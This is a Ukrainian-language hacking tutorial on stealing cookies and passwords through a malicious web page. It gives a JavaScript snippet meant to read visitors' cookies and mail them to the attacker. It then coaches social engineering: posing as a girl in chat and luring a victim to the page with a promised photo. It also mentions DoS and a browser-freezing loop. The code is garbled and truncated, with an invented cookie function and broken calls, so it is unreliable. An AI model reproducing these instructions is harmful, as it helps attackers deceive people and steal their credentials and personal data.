Скрипти для крадіжки паролів
br>Отже, в цій статті я розповім, як можна отримати пароль і будь-яку цікаву інформацію за допомогою сайту. Все що потрібно "хацкеру" - це просто мати в мережі свою сторінку, на яку ви прийдете самі, або вас туди заманять. Блукаючи по мережі, я все частіше чую погані відгуки про социнжинерію. Якщо вас не цікавлять способи злому із застосуванням социнжинерії або для вас це все дитячий белькіт, то натисніть у верхньому кутку вашого браузера хрестик і забудьте про існування цієї статті. У наш час мало тільки розбиратися в системних кодах і всяких програмних штучках, але ще треба вміти спілкуватися з народом. Багато хакерів зламують банки, комп'ютери, бази даних не тільки обчислюючи вразливості в системі безпеки, але й користуються социнженерією на кожному розі, адже хакер не тільки той, хто зламав систему, але й той, хто методом спілкування отримує найчастіше доступ до найцікавіших місць Інтернету. . Досить згадати так званого мега хакера Митника, який зламав систему безпеки банку за допомогою саме тієї самої соценжинерії. Спочатку я поясню спосіб злому простих користувачів, а потім більш глобальний злом, наприклад якийсь нитка фірми. Уявіть собі, що "хацкер" платить за мережу чималу суму і починає подумувати, як зробити її безкоштовною, або його не пускають без пароля на якийсь ресурс у мережі, а у вас є те, що йому потрібно. Спочатку він створює собі сторінку в мережі і на одній зі сторінок вживляє код приблизно такий!
var cook = show_all_cookies ();
document.open("cookies",cook);
document.write("
document.close("cookies");
(скрипт з метою безпеки було трохи змінено) Тепер залишається тільки заманити на сайт жертву, де вилетить віконце з написом "Доброго дня доби" після натискання на кнопку ОК на мило зловмисника будуть надіслані ваші Cookies, в яких міститься багато чого цікавого - від вашого IP адреси до паролів до служб, якими ви користуєтесь.
При простому вивченні cookies можна відкрити досить багато цікавої інформації. Все, чим зловмисник ризикує - це те, що він світить своє мило, але зараз занадто багато халявних поштових скриньок, це не так небезпечно. Зазвичай ящик створюється для проведення атаки, а потім або зноситься або закидається і зломщика вже не знайти. Хоча можна цей скрипт написати у файлі з розширенням js та вставити на сайті його за допомогою
Викладаємо свої!
у цьому випадку мило вже не світиться. Як заманити жертву на свій сайт? Так способів до безумства багато, наприклад, ви ввалюєтеся на чат і вибираєте жертву, трохи поговоривши з жертвою, ви повинні домогтися її розташування, найкраще якщо ваша жертва буде протилежної вам статі. Практика показує, що найкраще щоб ви були представлені в чаті дівчиною, відповідно вибираєте собі нік, який би вас характеризував, як дівчину (при розмові дивіться, що пишіть. Не видайте себе закінченнями слів, якщо ви прикинулися дівчиною, то будьте їй). Кожному зрозуміло, що з дівчиною говоритимуть усі. Пам'ятайте, що краще на жертву не тиснути, а, наприклад, запитати "а у тебе є фотка? Моя лежить ось за цією адресою http://ваш сайт.ru, сходи якщо хочеш". Кожному хлопцеві буде цікаво знати, як виглядає його співрозмовниця, а як тільки він потрапить на вашу сторінку, ви лізьте в ящик поту і забирайте звідти його Cookies. Ось і все, тепер просто треба в них поритися і ви знайдете практично все, що хочете, таким же способом можна дізнаватися IP адресу людини, яка користується проксі-серверами, а знаючи IP, вже можна буде перевірити його на розшаровані ресурси, провести Dos атаку або просто по-дитячому викинути з чату. А також можна просто приколюватися за допомогою сайту, наприклад, за допомогою цього скрипту:
for(I=1 ; I
Зависає
